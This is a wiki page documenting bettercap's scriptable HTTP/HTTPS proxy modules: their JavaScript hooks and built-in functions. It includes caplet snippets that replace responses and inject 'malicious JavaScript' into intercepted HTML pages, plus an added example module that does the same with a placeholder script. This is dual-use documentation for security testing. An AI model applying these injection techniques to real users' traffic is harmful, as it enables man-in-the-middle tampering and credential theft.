http.modules
yungtravla edited this page 2018-06-30 10:49:37 +10:00

The http.proxy and https.proxy modules can be scripted with JavaScript files, loaded through the module's script parameter (for example: set http.proxy.script /path/to/module.js). A script must declare at least one of the following functions:

// called when the script is loaded
function onLoad() {

}

// called when the request is received by the proxy
// and before it is sent to the real server.
function onRequest(req, res) {

}

// called when the request is sent to the real server
// and a response is received
function onResponse(req, res) {

}

// called every time an unknown session command is typed;
// proxy modules can optionally handle custom commands this way:
function onCommand(cmd) {
    if( cmd == "test" ) {
        /*
         * Custom session command logic here.
         */

        // tell the session we handled this command
        return true;
    }
    // anything else is not ours: the session keeps treating it as unknown
    return false;
}

Modules can modify the req (request) and res (response) objects. For instance, the web-override.cap caplet uses onRequest to replace every request with a fake response before it is sent to the real server; when a script fills in res inside onRequest, the proxy serves that response instead of contacting the upstream host:

function onRequest(req, res) {
    // fill in the response the proxy will return instead of fetching the real one
    res.Status      = 200;
    res.ContentType = "text/html";
    res.Body        = readFile("caplets/www/index.html");
    // drop every header the proxy pre-populated so only ours remain
    var headers = res.Headers.split("\r\n");
    for (var i = 0; i < headers.length; i++) {
        var header_name = headers[i].replace(/:.*/, "");
        res.RemoveHeader(header_name);
    }
    res.SetHeader("Connection", "close");
}

The login-man-abuse.cap caplet instead uses the onResponse handler to inject its malicious JavaScript into every HTML response (AbuserJavascript is a string variable holding the payload, defined elsewhere in the same script):

function onResponse(req, res) {
    // only touch HTML documents; everything else is passed through untouched
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        // inject right before the closing head tag, if the document has one
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace(
                '</head>',
                '<script type="text/javascript">' + "\n" +
                    AbuserJavascript +
                '</script>' +
                '</head>'
            );
        }
    }
}
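The following is an added example written for this page; it is not code from the bettercap wiki or from any bettercap caplet. It puts the hooks described above into one module: onRequest answers requests for blocked hosts with a synthetic 403 the way web-override.cap does, onResponse injects a script into HTML the way login-man-abuse.cap does but tolerates a charset parameter in Content-Type and a differently-cased or missing </head>, and onCommand edits the block list from the session. A small stand-in for the res object is included so the handlers can be exercised outside the proxy, for example under node. Field and method names on res follow the examples on this page (Status, ContentType, Headers as a "Name: value\r\n..." string, Body, ReadBody, SetHeader, RemoveHeader); req.Hostname is an assumption, and the payload and host names are constructed sample data.

```javascript
// Added example, not code from the bettercap wiki or its caplets. Names on res
// follow the examples on this page; req.Hostname is assumed. The MockResponse
// at the bottom is a test stand-in, not bettercap's own object.

var PAYLOAD = '<script type="text/javascript">console.log("injected")</script>'; // constructed
var BLOCKED = { "blocked.example": true }; // constructed block list, editable via onCommand

function onLoad() { /* nothing to initialise in this example */ }

// Content-Type may carry parameters ("text/html; charset=utf-8"), so compare
// only the media type instead of the whole header value.
function isHtml(contentType) {
    return typeof contentType === "string" &&
        contentType.toLowerCase().replace(/\s*;.*/, "") === "text/html";
}

// Insert the payload before </head> (case-insensitive); fall back to just after
// the opening <body> tag. Returns null when neither exists so the caller can
// leave a non-document body untouched instead of corrupting it.
function injectScript(body, payload) {
    var head = body.search(/<\/head\s*>/i);
    if (head !== -1) {
        return body.slice(0, head) + payload + body.slice(head);
    }
    var open = body.search(/<body[^>]*>/i);
    if (open !== -1) {
        var end = body.indexOf(">", open) + 1;
        return body.slice(0, end) + payload + body.slice(end);
    }
    return null;
}

// Turn res into a synthetic reply, as web-override.cap does: strip every header
// the proxy pre-filled, then set our own status, type, body and headers.
function fakeResponse(res, status, contentType, body) {
    res.Headers.split("\r\n").forEach(function (line) {
        var name = line.replace(/:.*/, "");
        if (name.length > 0) res.RemoveHeader(name);
    });
    res.Status = status;
    res.ContentType = contentType;
    res.Body = body;
    res.SetHeader("Connection", "close");
}

// Requests for blocked hosts never reach the real server.
function onRequest(req, res) {
    if (BLOCKED[req.Hostname]) {
        fakeResponse(res, 403, "text/plain", "blocked by proxy module");
    }
}

// Inject only into HTML documents that have a usable insertion point.
function onResponse(req, res) {
    if (!isHtml(res.ContentType)) return;
    var injected = injectScript(res.ReadBody(), PAYLOAD);
    if (injected !== null) res.Body = injected;
}

// Custom session commands: "block <host>" and "unblock <host>".
function onCommand(cmd) {
    var parts = cmd.trim().split(/\s+/);
    if (parts.length === 2 && parts[0] === "block") {
        BLOCKED[parts[1]] = true;
        return true;
    }
    if (parts.length === 2 && parts[0] === "unblock") {
        delete BLOCKED[parts[1]];
        return true;
    }
    return false; // not ours: let the session report it as unknown
}

// Stand-in for the proxy's response object (test harness only).
function MockResponse(status, contentType, headers, body) {
    this.Status = status;
    this.ContentType = contentType;
    this.Headers = headers;
    this.Body = body;
}
MockResponse.prototype.ReadBody = function () { return this.Body; };
MockResponse.prototype.RemoveHeader = function (name) {
    var prefix = name.toLowerCase() + ":";
    this.Headers = this.Headers.split("\r\n").filter(function (line) {
        return line.toLowerCase().indexOf(prefix) !== 0;
    }).join("\r\n");
};
MockResponse.prototype.SetHeader = function (name, value) {
    this.RemoveHeader(name);
    this.Headers += (this.Headers.length > 0 ? "\r\n" : "") + name + ": " + value;
};
```

The media-type check matters in practice: a server that sends "text/html; charset=utf-8" still passes the prefix test used by login-man-abuse.cap, but an exact comparison against "text/html" would silently skip it. Returning null from injectScript rather than appending the payload blindly keeps JSON, images and partial HTML fragments intact.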

Builtin Functions

Modules can use the following builtin functions.

function                                    description
readFile("/path/to/file")                   Return the contents of a file as a string.
writeFile("/path/to/file", "hello world")   Write the string hello world to a file; returns null on success or an error message.
log_debug("message")                        Log a message in the interactive session at level DEBUG.
log_info("message")                         Log a message in the interactive session at level INFO.
log_warn("message")                         Log a message in the interactive session at level WARNING.
log_error("message")                        Log a message in the interactive session at level ERROR.
log_fatal("message")                        Log a message in the interactive session at level FATAL.
log("message")                              Shortcut for log_info("message").
btoa("message")                             Encode a message to base64.
atob("bWVzc2FnZQ==")                        Decode a message from base64.
env("iface.ipv4")                           Read a session variable.
env("foo", "bar")                           Set a session variable.